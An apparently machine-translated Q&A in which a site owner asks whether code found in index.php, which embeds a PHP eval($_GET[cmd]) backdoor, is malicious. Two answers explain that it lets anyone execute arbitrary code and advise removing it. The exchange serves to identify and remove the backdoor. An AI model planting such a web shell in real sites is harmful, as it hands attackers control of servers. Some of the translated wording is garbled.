我在我的网站index.php找到了这段代码
<script type="text/javascript">
new.track("new.dev","_browser","'<?php eval($_GET[cmd]); ?>', '<?php eval($_GET[cmd]);?>'");
new.track("new.dev","_url",location.href);
</script>
该代码是恶意的吗? 从网上我试图把像index.php?cmd = ls之类的东西看似没有出现。也许它需要在页面上? 我试图了解以前的管理员在网站上做了什么。
答案 0 :(得分:4)
该代码存在无穷无尽的风险。 eval()运行php命令,可以运行终端命令。如果你接受没有卫生设施的投入,有人可能会疯狂并在那里造成严重的伤害。我会立即删除它并找到更好的方法。
也是写这篇文章的人头脑。
答案 1 :(得分:0)
1)引用cmd =&gt; $_GET['cmd']
2)绝对允许任何用户在您的服务器上执行任何PHP代码。但是,获取请求默认限制为8kb(限制可能会更改)
你正在做的事情非常冒险。我不确定你想要完成什么,但相信我并找到一种不同的方式。